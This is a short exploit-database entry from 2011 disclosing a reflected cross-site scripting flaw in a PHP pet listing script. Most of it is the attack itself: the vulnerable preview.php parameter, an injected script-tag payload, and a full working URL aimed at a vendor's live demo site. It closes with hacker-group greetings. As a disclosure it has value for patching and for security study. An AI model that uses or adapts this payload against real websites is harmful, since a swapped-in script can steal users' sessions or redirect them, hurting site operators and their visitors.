Pet Listing Cross Site Scripting

2011-12-09T00:00:00
ID PACKETSTORM:107694
Type packetstorm
Reporter Mr.PaPaRoSSe
Modified 2011-12-09T00:00:00

Description

                                        
                                            `  
# Exploit Title: Pet Listing Script XSS  
# Date: 09.12.2011 - 17.00  
# Author: Mr.PaPaRoSSe  
# Tested On: Win7  
# Platform: Php  
  
-------------------------------------------------------------  
  
preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">  
  
<script>alert(document.domain)</script>  
  
DEMO  
http://www.classifiedsgeek.com/pet-listing/demo/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from="><script>alert(document.domain)</script>  
  
-------------------------------------------------------------  
Contact: paparosse.blogspot.com  
Greetz: Http://DarkDevilz.in/  
-------------------------------------------------------------  
- Mr.PaPaRoSSe / 3spi0n -  
~ And All DD'z Family  
-------------------------------------------------------------  
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#   
  
`